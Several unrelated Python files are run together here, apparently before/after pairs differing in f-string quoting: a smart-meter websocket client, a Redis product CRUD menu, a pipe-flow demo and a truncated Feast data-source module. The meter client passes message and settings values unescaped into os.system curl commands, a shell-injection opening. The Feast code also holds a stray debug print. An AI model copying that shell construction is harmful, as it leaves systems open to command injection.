msg_meter = msg['Chain2Data']['Meter'] msg_type = msg['Chain2Data']['Type'] msg_payload = msg['Chain2Data']['Payload'] msg_epoch = None msg_energy = None msg_power = None if msg_type == 'CF1': msg_epoch = msg_payload['MeasurePosixTimestamp'] msg_energy = msg_payload['TotalActEnergy'] if msg_type == 'CF21': msg_epoch = msg_payload['EventPosixTimestamp'] msg_power = msg_payload['InstantPower'] if msg_type in ['CF1', 'CF21']: d['epoch'].append(msg_epoch) d['meter'].append(msg_meter) d['type'].append(msg_type) d['energy'].append(msg_energy) d['power'].append(msg_power) if msg_type == 'CF1': trim_dict(d) logger.debug(f"Dictionary trimmed to {len(d["epoch"])}") save_json(d) logger.info('Json file updated.') upload() logger.info('Current data uploaded') if last_upload.date() < now.date(): upload(now.strftime("%Y%m%d")) logger.info(f'Daily data uploaded {now.strftime('%Y%m%d')}') last_upload = now if msg_type == 'CF1': c = f"curl -i -XPOST 'http://localhost:8086/write?db=chain2gate' --data-binary '{msg_meter} energy={msg_energy} {msg_epoch}000000000' > /dev/null 2>&1" logger.debug('Sending energy data to Influxdb') os.system(c) if msg_type == 'CF21': c = f"curl -i -XPOST 'http://localhost:8086/write?db=chain2gate' --data-binary '{msg_meter} power={msg_power} {msg_epoch}000000000' > /dev/null 2>&1" logger.debug('Sending power data to Influxdb') os.system(c) except: logger.error('Socket error - 
retrying connection in 10 sec (Ctrl-C to quit)') await asyncio.sleep(10) continue if __name__ == '__main__': logger.debug("Program started.") configure() logger.debug("Configuration completed.") asyncio.get_event_loop().run_until_complete(chain2client())
#!/usr/bin/env python3 from logger import logger import asyncio import websockets import json from pathlib import Path import datetime import os RootDir = '/home/pi/chain2gate' DeviceId = 'c2g-XXXXXXXXX' ServerIP = 'XXX.XXX.XXX.XXX' ApiKey = 'API_KEY' def configure(): global DeviceId, RootDir, ServerIP, ApiKey with open(f"{RootDir}/settings.json", 'r') as jsonfile: settings = json.load(jsonfile) DeviceId = settings.get('DeviceId') ServerIP = settings.get('ServerIP') ApiKey = settings.get('ApiKey') def trim_dict(d): emax = max(d['epoch']) emin = min([e for e in d['epoch'] if e > emax - 60*60*24]) imin = d['epoch'].index(emin) d['epoch'] = d['epoch'][imin:] d['meter'] = d['meter'][imin:] d['type'] = d['type'][imin:] d['energy'] = d['energy'][imin:] d['power'] = d['power'][imin:] def load_json(): try: with open(f"{RootDir}/{DeviceId}.json", 'r') as jsonfile: d = json.load(jsonfile) except: d = { 'epoch': [], 'meter': [], 'type': [], 'energy': [], 'power': [] } return d def save_json(d): with open(f"{RootDir}/{DeviceId}.json", 'w') as jsonfile: json.dump(d, jsonfile) def upload(date=None): c = f'curl -X PUT "http://{ServerIP}/api/chain2gate/{DeviceId}?api_key={ApiKey}" -H "accept: application/json" -H "Content-Type: multipart/form-data" -F "file=@{RootDir}/{DeviceId}.json;type=text/plain" > /dev/null 2>&1' if date is not None: c = f'curl -X PUT "http://{ServerIP}/api/chain2gate/{DeviceId}?api_key={ApiKey}&date={date}" -H "accept: application/json" -H "Content-Type: multipart/form-data" -F "file=@{RootDir}/{DeviceId}.json;type=text/plain" > /dev/null 2>&1' logger.debug(f'Uploading: {c}') os.system(c) async def chain2client(): while True: # outer loop restarted every time the connection fails uri = f"ws://{DeviceId}.local:81" logger.debug(f'uri: {uri}') logger.debug('Reading data json file.') d = load_json() logger.debug('Read.') last_upload = datetime.datetime.now() try: async with websockets.connect(uri) as websocket: logger.info('Client started.') async for message in websocket: logger.debug('Message received.') msg = json.loads(message) now = datetime.datetime.now() if 'Chain2Data' in msg: logger.info(msg) msg_meter = msg['Chain2Data']['Meter'] msg_type = msg['Chain2Data']['Type'] msg_payload = msg['Chain2Data']['Payload'] msg_epoch = None msg_energy = None msg_power = None if msg_type == 'CF1': msg_epoch = msg_payload['MeasurePosixTimestamp'] msg_energy = msg_payload['TotalActEnergy'] if msg_type == 'CF21': msg_epoch = msg_payload['EventPosixTimestamp'] msg_power = msg_payload['InstantPower'] if msg_type in ['CF1', 'CF21']: d['epoch'].append(msg_epoch) d['meter'].append(msg_meter) d['type'].append(msg_type) d['energy'].append(msg_energy) d['power'].append(msg_power) if msg_type == 'CF1': trim_dict(d) logger.debug(f"Dictionary trimmed to {len(d['epoch'])}") save_json(d) logger.info('Json file updated.') upload() logger.info('Current data uploaded') if last_upload.date() < now.date(): upload(now.strftime("%Y%m%d")) logger.info(f'Daily data uploaded {now.strftime("%Y%m%d")}') last_upload = now if msg_type == 'CF1': c = f"curl -i -XPOST 'http://localhost:8086/write?db=chain2gate' --data-binary '{msg_meter} energy={msg_energy} {msg_epoch}000000000' > /dev/null 2>&1" logger.debug('Sending energy data to Influxdb') os.system(c) if msg_type == 'CF21': c = f"curl -i -XPOST 'http://localhost:8086/write?db=chain2gate' --data-binary '{msg_meter} power={msg_power} {msg_epoch}000000000' > /dev/null 2>&1" logger.debug('Sending power data to Influxdb') os.system(c) except: logger.error('Socket error - 
retrying connection in 10 sec (Ctrl-C to quit)') await asyncio.sleep(10) continue if __name__ == '__main__': logger.debug("Program started.") configure() logger.debug("Configuration completed.") asyncio.get_event_loop().run_until_complete(chain2client())
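# --- Hedged alternative sketch (not part of the script above) -------------------------------
# The same InfluxDB 1.x line-protocol write that the curl commands perform, done with the
# requests library so failures can be logged instead of silently discarded. Host, database
# name and measurement layout mirror the script's assumptions; write_point is a made-up name.
import requests

def write_point(meter, field, value, epoch_s):
    # InfluxDB line protocol: <measurement> <field>=<value> <timestamp in nanoseconds>
    line = f"{meter} {field}={value} {epoch_s}000000000"
    try:
        resp = requests.post(
            "http://localhost:8086/write",
            params={"db": "chain2gate"},
            data=line.encode(),
            timeout=5,
        )
        resp.raise_for_status()
    except requests.RequestException as exc:
        logger.error(f"InfluxDB write failed: {exc}")   # reuses the script's logger

# e.g. write_point(msg_meter, "power", msg_power, msg_epoch) for a CF21 message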
import redis def testa_chave(chave): try: conn = conectar() dados = conn.keys(pattern='produtos:*') # chamar as chaves e depois os produtos dados = str(dados) if chave in dados: return True else: return False except redis.exceptions.ConnectionError as e: print(f'Não foi possível testar a chave. {e}') def gera_id(): try: conn = conectar() # conecta chave = conn.get('chave') # pega a ultima chave, comando get if chave: chave = conn.incr('chave') # se a chave existir usa o comando incr do redis para incrementar return chave else: conn.set('chave', 1) # caso a chave não exista cadastra a primeira return 1 except redis.exceptions.ConnectionError as e: print(f'Não foi possível gerar a chave. {e}') def conectar(): """ Função para conectar ao servidor """ conn = redis.Redis(host='localhost', port=6379) return conn # É preciso habilitar a conexão def desconectar(conn): """ Função para desconectar do servidor. """ conn.connection_pool.disconnect() def listar(): """ Função para listar os produtos """ conn = conectar() try: dados = conn.keys(pattern='produtos:*') # chamar as chaves e depois os produtos if len(dados) > 0: print('Listando produtos...') print('--------------------') for chave in dados: produto = conn.hgetall(chave) print(f"ID: {str(chave,"utf-8", "ignore")}") print(f"Produto: {str(produto[b"nome"],"utf-8", "ignore")}") print(f"Preço: {str(produto[b"preco"],"utf-8", "ignore")}") print(f"Estoque: {str(produto[b"estoque"],"utf-8", "ignore")}") print('--------------------') # Os dados vem em formato de string binária (por isso o b'variável'), por isso converte-se o dado em # utf-8, o ignore é pra ignorar erros que podem aparecer else: print('Não existem produtos cadastrados.') except redis.exceptions.ConnectionError as e: print(f'Não foi possível listar os produtos. {e}') desconectar(conn) def inserir(): """ Função para inserir um produto """ conn = conectar() nome = input('Informe o nome do produto: ') preco = float(input('Informe o preço: ')) estoque = int(input('Informe o estoque: ')) produto = {"nome": nome, "preco": preco, "estoque": estoque} # Chave | valor # padrão seguido será produtos:cod(1,2,3...)) chave = f'produtos:{gera_id()}' try: res = conn.hmset(chave, produto) # lembrando hm pois são multiplos valores if res: print(f'O produto {nome} foi inserido com suscesso.') else: print('Não foi possível inserir o produto.') except redis.exceptions.ConnectionError as e: print(f'Não foi possível inserir o produto. {e}') desconectar(conn) def atualizar(): """ Função para atualizar um produto """ conn = conectar() chave = input('Informe a chave do produto: ') nome = input('Informe o nome do produto: ') preco = float(input('Informe o preço: ')) estoque = int(input('Informe o estoque: ')) produto = {"nome": nome, "preco": preco, "estoque": estoque} # Chave | valor resposta = testa_chave(chave) if resposta: try: res = conn.hmset(chave, produto) if res: print(f'O produto {nome} foi atuaizado com sucesso.') # Nesse caso se a chave não existir ela sera criada, então não tem motivo para colocar o else, depois # adiciono uma função para não permitir isso, note que no momento a diferenã pro inserir é que a chave é # gerada e aqui é recebida # O programa foi atualizado, agora possui um fç que trata a chave, se ela existir da continuidade ao código # se não interrompe, portanto nã precisa do else except redis.exceptions.ConnectionError as e: print(f'Não foi possível atualizar o produto. 
{e}') else: print('Chave inexistente, confira a escrita.') desconectar(conn) def deletar(): """ Função para deletar um produto """ conn = conectar() chave = input('Informe a chave do produto: ') try: res = conn.delete(chave) if res == 1: print('O produto foi deletado com sucesso.') else: print('Não existe produto com a chave informada.') except redis.exceptions.ConnectionError as e: print(f'Erro ao conectar ao redis. {e}') desconectar(conn) def menu(): """ Função para gerar o menu inicial """ print('=========Gerenciamento de Produtos==============') print('Selecione uma opção: ') print('1 - Listar produtos.') print('2 - Inserir produtos.') print('3 - Atualizar produto.') print('4 - Deletar produto.') opcao = int(input()) if opcao in [1, 2, 3, 4]: if opcao == 1: listar() elif opcao == 2: inserir() elif opcao == 3: atualizar() elif opcao == 4: deletar() else: print('Opção inválida') else: print('Opção inválida')
import redis def testa_chave(chave): try: conn = conectar() dados = conn.keys(pattern='produtos:*') # chamar as chaves e depois os produtos dados = str(dados) if chave in dados: return True else: return False except redis.exceptions.ConnectionError as e: print(f'Não foi possível testar a chave. {e}') def gera_id(): try: conn = conectar() # conecta chave = conn.get('chave') # pega a ultima chave, comando get if chave: chave = conn.incr('chave') # se a chave existir usa o comando incr do redis para incrementar return chave else: conn.set('chave', 1) # caso a chave não exista cadastra a primeira return 1 except redis.exceptions.ConnectionError as e: print(f'Não foi possível gerar a chave. {e}') def conectar(): """ Função para conectar ao servidor """ conn = redis.Redis(host='localhost', port=6379) return conn # É preciso habilitar a conexão def desconectar(conn): """ Função para desconectar do servidor. """ conn.connection_pool.disconnect() def listar(): """ Função para listar os produtos """ conn = conectar() try: dados = conn.keys(pattern='produtos:*') # chamar as chaves e depois os produtos if len(dados) > 0: print('Listando produtos...') print('--------------------') for chave in dados: produto = conn.hgetall(chave) print(f"ID: {str(chave,'utf-8', 'ignore')}") print(f"Produto: {str(produto[b'nome'],'utf-8', 'ignore')}") print(f"Preço: {str(produto[b'preco'],'utf-8', 'ignore')}") print(f"Estoque: {str(produto[b'estoque'],'utf-8', 'ignore')}") print('--------------------') # Os dados vem em formato de string binária (por isso o b'variável'), por isso converte-se o dado em # utf-8, o ignore é pra ignorar erros que podem aparecer else: print('Não existem produtos cadastrados.') except redis.exceptions.ConnectionError as e: print(f'Não foi possível listar os produtos. {e}') desconectar(conn) def inserir(): """ Função para inserir um produto """ conn = conectar() nome = input('Informe o nome do produto: ') preco = float(input('Informe o preço: ')) estoque = int(input('Informe o estoque: ')) produto = {"nome": nome, "preco": preco, "estoque": estoque} # Chave | valor # padrão seguido será produtos:cod(1,2,3...)) chave = f'produtos:{gera_id()}' try: res = conn.hmset(chave, produto) # lembrando hm pois são multiplos valores if res: print(f'O produto {nome} foi inserido com suscesso.') else: print('Não foi possível inserir o produto.') except redis.exceptions.ConnectionError as e: print(f'Não foi possível inserir o produto. {e}') desconectar(conn) def atualizar(): """ Função para atualizar um produto """ conn = conectar() chave = input('Informe a chave do produto: ') nome = input('Informe o nome do produto: ') preco = float(input('Informe o preço: ')) estoque = int(input('Informe o estoque: ')) produto = {"nome": nome, "preco": preco, "estoque": estoque} # Chave | valor resposta = testa_chave(chave) if resposta: try: res = conn.hmset(chave, produto) if res: print(f'O produto {nome} foi atuaizado com sucesso.') # Nesse caso se a chave não existir ela sera criada, então não tem motivo para colocar o else, depois # adiciono uma função para não permitir isso, note que no momento a diferenã pro inserir é que a chave é # gerada e aqui é recebida # O programa foi atualizado, agora possui um fç que trata a chave, se ela existir da continuidade ao código # se não interrompe, portanto nã precisa do else except redis.exceptions.ConnectionError as e: print(f'Não foi possível atualizar o produto. 
{e}') else: print('Chave inexistente, confira a escrita.') desconectar(conn) def deletar(): """ Função para deletar um produto """ conn = conectar() chave = input('Informe a chave do produto: ') try: res = conn.delete(chave) if res == 1: print('O produto foi deletado com sucesso.') else: print('Não existe produto com a chave informada.') except redis.exceptions.ConnectionError as e: print(f'Erro ao conectar ao redis. {e}') desconectar(conn) def menu(): """ Função para gerar o menu inicial """ print('=========Gerenciamento de Produtos==============') print('Selecione uma opção: ') print('1 - Listar produtos.') print('2 - Inserir produtos.') print('3 - Atualizar produto.') print('4 - Deletar produto.') opcao = int(input()) if opcao in [1, 2, 3, 4]: if opcao == 1: listar() elif opcao == 2: inserir() elif opcao == 3: atualizar() elif opcao == 4: deletar() else: print('Opção inválida') else: print('Opção inválida')
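# --- Hedged sketch (not part of the script above) -------------------------------------------
# testa_chave does a substring match over str(conn.keys('produtos:*')), which can be fooled by
# partially matching key names. Redis answers key existence directly via EXISTS; redis-py
# exposes it as conn.exists(). chave_existe is a made-up name for this alternative.
def chave_existe(chave):
    try:
        conn = conectar()
        return conn.exists(chave) == 1   # EXISTS returns the number of matching keys
    except redis.exceptions.ConnectionError as e:
        print(f'Não foi possível testar a chave. {e}')
        return False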
""" DEMO 6 ------ Calculate flow coefficient and resistance coefficient of draw-off point from known flow rate and pressure drop. """ import quantities as qty from pypeflow.core.flow_coefficient import FlowCoefficient from pypeflow.core.resistance_coefficient import ResistanceCoefficient from pypeflow.core.pipe_schedules import PipeSchedule40 V = qty.VolumeFlowRate(0.29, 'L/s') dp = qty.Pressure(0.05, 'MPa') Kv = FlowCoefficient.calc_Kv(V, dp) print(f'flow coefficient = {Kv:.3f}') di = PipeSchedule40.inside_diameter(DN=qty.Length(15.0, 'mm')) print(f'inside diameter = {di('mm'):.3f} mm') zeta = ResistanceCoefficient.from_Kv(Kv, di) print(f'resistance coefficient = {zeta:.3f}')
""" DEMO 6 ------ Calculate flow coefficient and resistance coefficient of draw-off point from known flow rate and pressure drop. """ import quantities as qty from pypeflow.core.flow_coefficient import FlowCoefficient from pypeflow.core.resistance_coefficient import ResistanceCoefficient from pypeflow.core.pipe_schedules import PipeSchedule40 V = qty.VolumeFlowRate(0.29, 'L/s') dp = qty.Pressure(0.05, 'MPa') Kv = FlowCoefficient.calc_Kv(V, dp) print(f'flow coefficient = {Kv:.3f}') di = PipeSchedule40.inside_diameter(DN=qty.Length(15.0, 'mm')) print(f'inside diameter = {di("mm"):.3f} mm') zeta = ResistanceCoefficient.from_Kv(Kv, di) print(f'resistance coefficient = {zeta:.3f}')
# Copyright 2020 The Feast Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import enum import warnings from abc import ABC, abstractmethod from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union from google.protobuf.json_format import MessageToJson from feast import type_map from feast.data_format import StreamFormat from feast.field import Field from feast.protos.feast.core.DataSource_pb2 import DataSource as DataSourceProto from feast.repo_config import RepoConfig, get_data_source_class_from_type from feast.types import VALUE_TYPES_TO_FEAST_TYPES from feast.value_type import ValueType class SourceType(enum.Enum): """ DataSource value type. Used to define source types in DataSource. """ UNKNOWN = 0 BATCH_FILE = 1 BATCH_BIGQUERY = 2 STREAM_KAFKA = 3 STREAM_KINESIS = 4 BATCH_TRINO = 5 class KafkaOptions: """ DataSource Kafka options used to source features from Kafka messages """ def __init__( self, bootstrap_servers: str, message_format: StreamFormat, topic: str, ): self.bootstrap_servers = bootstrap_servers self.message_format = message_format self.topic = topic @classmethod def from_proto(cls, kafka_options_proto: DataSourceProto.KafkaOptions): """ Creates a KafkaOptions from a protobuf representation of a kafka option Args: kafka_options_proto: A protobuf representation of a DataSource Returns: Returns a BigQueryOptions object based on the kafka_options protobuf """ kafka_options = cls( bootstrap_servers=kafka_options_proto.bootstrap_servers, message_format=StreamFormat.from_proto(kafka_options_proto.message_format), topic=kafka_options_proto.topic, ) return kafka_options def to_proto(self) -> DataSourceProto.KafkaOptions: """ Converts an KafkaOptionsProto object to its protobuf representation. Returns: KafkaOptionsProto protobuf """ kafka_options_proto = DataSourceProto.KafkaOptions( bootstrap_servers=self.bootstrap_servers, message_format=self.message_format.to_proto(), topic=self.topic, ) return kafka_options_proto class KinesisOptions: """ DataSource Kinesis options used to source features from Kinesis records """ def __init__( self, record_format: StreamFormat, region: str, stream_name: str, ): self.record_format = record_format self.region = region self.stream_name = stream_name @classmethod def from_proto(cls, kinesis_options_proto: DataSourceProto.KinesisOptions): """ Creates a KinesisOptions from a protobuf representation of a kinesis option Args: kinesis_options_proto: A protobuf representation of a DataSource Returns: Returns a KinesisOptions object based on the kinesis_options protobuf """ kinesis_options = cls( record_format=StreamFormat.from_proto(kinesis_options_proto.record_format), region=kinesis_options_proto.region, stream_name=kinesis_options_proto.stream_name, ) return kinesis_options def to_proto(self) -> DataSourceProto.KinesisOptions: """ Converts an KinesisOptionsProto object to its protobuf representation. 
Returns: KinesisOptionsProto protobuf """ kinesis_options_proto = DataSourceProto.KinesisOptions( record_format=self.record_format.to_proto(), region=self.region, stream_name=self.stream_name, ) return kinesis_options_proto _DATA_SOURCE_OPTIONS = { DataSourceProto.SourceType.BATCH_FILE: "feast.infra.offline_stores.file_source.FileSource", DataSourceProto.SourceType.BATCH_BIGQUERY: "feast.infra.offline_stores.bigquery_source.BigQuerySource", DataSourceProto.SourceType.BATCH_REDSHIFT: "feast.infra.offline_stores.redshift_source.RedshiftSource", DataSourceProto.SourceType.BATCH_SNOWFLAKE: "feast.infra.offline_stores.snowflake_source.SnowflakeSource", DataSourceProto.SourceType.BATCH_TRINO: "feast.infra.offline_stores.contrib.trino_offline_store.trino_source.TrinoSource", DataSourceProto.SourceType.BATCH_SPARK: "feast.infra.offline_stores.contrib.spark_offline_store.spark_source.SparkSource", DataSourceProto.SourceType.STREAM_KAFKA: "feast.data_source.KafkaSource", DataSourceProto.SourceType.STREAM_KINESIS: "feast.data_source.KinesisSource", DataSourceProto.SourceType.REQUEST_SOURCE: "feast.data_source.RequestSource", DataSourceProto.SourceType.PUSH_SOURCE: "feast.data_source.PushSource", } class DataSource(ABC): """ DataSource that can be used to source features. Args: name: Name of data source, which should be unique within a project timestamp_field (optional): (Deprecated) Event timestamp column used for point in time joins of feature values. created_timestamp_column (optional): Timestamp column indicating when the row was created, used for deduplicating rows. field_mapping (optional): A dictionary mapping of column names in this data source to feature names in a feature table or view. Only used for feature columns, not entity or timestamp columns. date_partition_column (optional): Timestamp column used for partitioning. description (optional) A human-readable description. tags (optional): A dictionary of key-value pairs to store arbitrary metadata. owner (optional): The owner of the data source, typically the email of the primary maintainer. timestamp_field (optional): Event timestamp field used for point in time joins of feature values. """ name: str timestamp_field: str created_timestamp_column: str field_mapping: Dict[str, str] date_partition_column: str description: str tags: Dict[str, str] owner: str def __init__( self, *, event_timestamp_column: Optional[str] = None, created_timestamp_column: Optional[str] = None, field_mapping: Optional[Dict[str, str]] = None, date_partition_column: Optional[str] = None, description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", name: Optional[str] = None, timestamp_field: Optional[str] = None, ): """ Creates a DataSource object. Args: name: Name of data source, which should be unique within a project event_timestamp_column (optional): (Deprecated) Event timestamp column used for point in time joins of feature values. created_timestamp_column (optional): Timestamp column indicating when the row was created, used for deduplicating rows. field_mapping (optional): A dictionary mapping of column names in this data source to feature names in a feature table or view. Only used for feature columns, not entity or timestamp columns. date_partition_column (optional): Timestamp column used for partitioning. description (optional): A human-readable description. tags (optional): A dictionary of key-value pairs to store arbitrary metadata. 
owner (optional): The owner of the data source, typically the email of the primary maintainer. timestamp_field (optional): Event timestamp field used for point in time joins of feature values. """ if not name: warnings.warn( ( "Names for data sources need to be supplied. " "Data sources without names will not be supported after Feast 0.23." ), UserWarning, ) self.name = name or "" if not timestamp_field and event_timestamp_column: warnings.warn( ( "The argument 'event_timestamp_column' is being deprecated. Please use 'timestamp_field' instead. " "instead. Feast 0.23 and onwards will not support the argument 'event_timestamp_column' for datasources." ), DeprecationWarning, ) self.timestamp_field = timestamp_field or event_timestamp_column or "" self.created_timestamp_column = ( created_timestamp_column if created_timestamp_column else "" ) self.field_mapping = field_mapping if field_mapping else {} self.date_partition_column = ( date_partition_column if date_partition_column else "" ) self.description = description or "" self.tags = tags or {} self.owner = owner or "" def __hash__(self): return hash((self.name, self.timestamp_field)) def __str__(self): return str(MessageToJson(self.to_proto())) def __eq__(self, other): if other is None: return False if not isinstance(other, DataSource): raise TypeError("Comparisons should only involve DataSource class objects.") if ( self.name != other.name or self.timestamp_field != other.timestamp_field or self.created_timestamp_column != other.created_timestamp_column or self.field_mapping != other.field_mapping or self.date_partition_column != other.date_partition_column or self.description != other.description or self.tags != other.tags or self.owner != other.owner ): return False return True @staticmethod @abstractmethod def from_proto(data_source: DataSourceProto) -> Any: """ Converts data source config in protobuf spec to a DataSource class object. Args: data_source: A protobuf representation of a DataSource. Returns: A DataSource class object. Raises: ValueError: The type of DataSource could not be identified. """ data_source_type = data_source.type if not data_source_type or ( data_source_type not in list(_DATA_SOURCE_OPTIONS.keys()) + [DataSourceProto.SourceType.CUSTOM_SOURCE] ): raise ValueError("Could not identify the source type being added.") if data_source_type == DataSourceProto.SourceType.CUSTOM_SOURCE: cls = get_data_source_class_from_type(data_source.data_source_class_type) return cls.from_proto(data_source) cls = get_data_source_class_from_type(_DATA_SOURCE_OPTIONS[data_source_type]) return cls.from_proto(data_source) @abstractmethod def to_proto(self) -> DataSourceProto: """ Converts a DataSourceProto object to its protobuf representation. """ raise NotImplementedError def validate(self, config: RepoConfig): """ Validates the underlying data source. Args: config: Configuration object used to configure a feature store. """ raise NotImplementedError @staticmethod @abstractmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: """ Returns the callable method that returns Feast type given the raw column type. """ raise NotImplementedError def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: """ Returns the list of column names and raw column types. Args: config: Configuration object used to configure a feature store. """ raise NotImplementedError def get_table_query_string(self) -> str: """ Returns a string that can directly be used to reference this table in SQL. 
""" raise NotImplementedError class KafkaSource(DataSource): def validate(self, config: RepoConfig): pass def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: pass def __init__( self, *args, name: Optional[str] = None, event_timestamp_column: Optional[str] = "", bootstrap_servers: Optional[str] = None, message_format: Optional[StreamFormat] = None, topic: Optional[str] = None, created_timestamp_column: Optional[str] = "", field_mapping: Optional[Dict[str, str]] = None, date_partition_column: Optional[str] = "", description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", timestamp_field: Optional[str] = "", batch_source: Optional[DataSource] = None, ): positional_attributes = [ "name", "event_timestamp_column", "bootstrap_servers", "message_format", "topic", ] _name = name _event_timestamp_column = event_timestamp_column _bootstrap_servers = bootstrap_servers or "" _message_format = message_format _topic = topic or "" if args: warnings.warn( ( "Kafka parameters should be specified as a keyword argument instead of a positional arg." "Feast 0.23+ will not support positional arguments to construct Kafka sources" ), DeprecationWarning, ) if len(args) > len(positional_attributes): raise ValueError( f"Only {', '.join(positional_attributes)} are allowed as positional args when defining " f"Kafka sources, for backwards compatibility." ) if len(args) >= 1: _name = args[0] if len(args) >= 2: _event_timestamp_column = args[1] if len(args) >= 3: _bootstrap_servers = args[2] if len(args) >= 4: _message_format = args[3] if len(args) >= 5: _topic = args[4] if _message_format is None: raise ValueError("Message format must be specified for Kafka source") print("Asdfasdf") super().__init__( event_timestamp_column=_event_timestamp_column, created_timestamp_column=created_timestamp_column, field_mapping=field_mapping, date_partition_column=date_partition_column, description=description, tags=tags, owner=owner, name=_name, timestamp_field=timestamp_field, ) self.batch_source = batch_source self.kafka_options = KafkaOptions( bootstrap_servers=_bootstrap_servers, message_format=_message_format, topic=_topic, ) def __eq__(self, other): if not isinstance(other, KafkaSource): raise TypeError( "Comparisons should only involve KafkaSource class objects." 
) if not super().__eq__(other): return False if ( self.kafka_options.bootstrap_servers != other.kafka_options.bootstrap_servers or self.kafka_options.message_format != other.kafka_options.message_format or self.kafka_options.topic != other.kafka_options.topic ): return False return True def __hash__(self): return super().__hash__() @staticmethod def from_proto(data_source: DataSourceProto): return KafkaSource( name=data_source.name, event_timestamp_column=data_source.timestamp_field, field_mapping=dict(data_source.field_mapping), bootstrap_servers=data_source.kafka_options.bootstrap_servers, message_format=StreamFormat.from_proto( data_source.kafka_options.message_format ), topic=data_source.kafka_options.topic, created_timestamp_column=data_source.created_timestamp_column, timestamp_field=data_source.timestamp_field, date_partition_column=data_source.date_partition_column, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, batch_source=DataSource.from_proto(data_source.batch_source), ) def to_proto(self) -> DataSourceProto: data_source_proto = DataSourceProto( name=self.name, type=DataSourceProto.STREAM_KAFKA, field_mapping=self.field_mapping, kafka_options=self.kafka_options.to_proto(), description=self.description, tags=self.tags, owner=self.owner, ) data_source_proto.timestamp_field = self.timestamp_field data_source_proto.created_timestamp_column = self.created_timestamp_column data_source_proto.date_partition_column = self.date_partition_column if self.batch_source: data_source_proto.batch_source.MergeFrom(self.batch_source.to_proto()) return data_source_proto @staticmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: return type_map.redshift_to_feast_value_type def get_table_query_string(self) -> str: raise NotImplementedError class RequestSource(DataSource): """ RequestSource that can be used to provide input features for on demand transforms Args: name: Name of the request data source schema Union[Dict[str, ValueType], List[Field]]: Schema mapping from the input feature name to a ValueType description (optional): A human-readable description. tags (optional): A dictionary of key-value pairs to store arbitrary metadata. owner (optional): The owner of the request data source, typically the email of the primary maintainer. """ name: str schema: List[Field] def __init__( self, *args, name: Optional[str] = None, schema: Optional[Union[Dict[str, ValueType], List[Field]]] = None, description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", ): """Creates a RequestSource object.""" positional_attributes = ["name", "schema"] _name = name _schema = schema if args: warnings.warn( ( "Request source parameters should be specified as a keyword argument instead of a positional arg." "Feast 0.23+ will not support positional arguments to construct request sources" ), DeprecationWarning, ) if len(args) > len(positional_attributes): raise ValueError( f"Only {', '.join(positional_attributes)} are allowed as positional args when defining " f"feature views, for backwards compatibility." ) if len(args) >= 1: _name = args[0] if len(args) >= 2: _schema = args[1] super().__init__(name=_name, description=description, tags=tags, owner=owner) if not _schema: raise ValueError("Schema needs to be provided for Request Source") if isinstance(_schema, Dict): warnings.warn( "Schema in RequestSource is changing type. The schema data type Dict[str, ValueType] is being deprecated in Feast 0.23. 
" "Please use List[Field] instead for the schema", DeprecationWarning, ) schemaList = [] for key, valueType in _schema.items(): schemaList.append( Field(name=key, dtype=VALUE_TYPES_TO_FEAST_TYPES[valueType]) ) self.schema = schemaList elif isinstance(_schema, List): self.schema = _schema else: raise Exception( "Schema type must be either dictionary or list, not " + str(type(_schema)) ) def validate(self, config: RepoConfig): pass def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: pass def __eq__(self, other): if not isinstance(other, RequestSource): raise TypeError( "Comparisons should only involve RequestSource class objects." ) if not super().__eq__(other): return False if isinstance(self.schema, List) and isinstance(other.schema, List): for field1, field2 in zip(self.schema, other.schema): if field1 != field2: return False return True else: return False def __hash__(self): return super().__hash__() @staticmethod def from_proto(data_source: DataSourceProto): deprecated_schema = data_source.request_data_options.deprecated_schema schema_pb = data_source.request_data_options.schema if deprecated_schema and not schema_pb: warnings.warn( "Schema in RequestSource is changing type. The schema data type Dict[str, ValueType] is being deprecated in Feast 0.23. " "Please use List[Field] instead for the schema", DeprecationWarning, ) dict_schema = {} for key, val in deprecated_schema.items(): dict_schema[key] = ValueType(val) return RequestSource( name=data_source.name, schema=dict_schema, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, ) else: list_schema = [] for field_proto in schema_pb: list_schema.append(Field.from_proto(field_proto)) return RequestSource( name=data_source.name, schema=list_schema, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, ) def to_proto(self) -> DataSourceProto: schema_pb = [] if isinstance(self.schema, Dict): for key, value in self.schema.items(): schema_pb.append( Field( name=key, dtype=VALUE_TYPES_TO_FEAST_TYPES[value.value] ).to_proto() ) else: for field in self.schema: schema_pb.append(field.to_proto()) data_source_proto = DataSourceProto( name=self.name, type=DataSourceProto.REQUEST_SOURCE, description=self.description, tags=self.tags, owner=self.owner, ) data_source_proto.request_data_options.schema.extend(schema_pb) return data_source_proto def get_table_query_string(self) -> str: raise NotImplementedError @staticmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: raise NotImplementedError class RequestDataSource(RequestSource): def __init__(self, *args, **kwargs): warnings.warn( "The 'RequestDataSource' class is deprecated and was renamed to RequestSource. Please use RequestSource instead. 
